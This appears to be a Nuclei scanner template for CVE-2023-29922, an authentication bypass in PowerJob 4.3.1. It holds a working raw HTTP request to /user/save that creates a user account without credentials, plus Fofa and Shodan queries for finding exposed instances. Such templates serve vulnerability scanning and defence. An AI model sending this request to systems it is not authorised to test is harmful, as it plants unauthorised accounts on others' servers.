nuclei-templates/http/cves/2023/CVE-2023-29922.yaml

56 lines
1.3 KiB
YAML

id: CVE-2023-29922
info:
name: PowerJob V4.3.1 - Authentication Bypass
author: Co5mos
severity: medium
description: |
PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.
reference:
- https://github.com/PowerJob/PowerJob/issues/585
- https://nvd.nist.gov/vuln/detail/CVE-2023-29922
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2023-29922
cwe-id: CWE-1188
epss-score: 0.00606
cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
fofa-query: app="PowerJob"
shodan-query: html:"PowerJob"
vendor: powerjob
product: powerjob
tags: cve,cve2023,auth-bypass,powerjob
variables:
str: "{{rand_base(6)}}"
http:
- raw:
- |
POST /user/save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{str}}","phone":"{{str}}","email":"{{str}}","webHook":"{{str}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":true'
- '"data":null'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200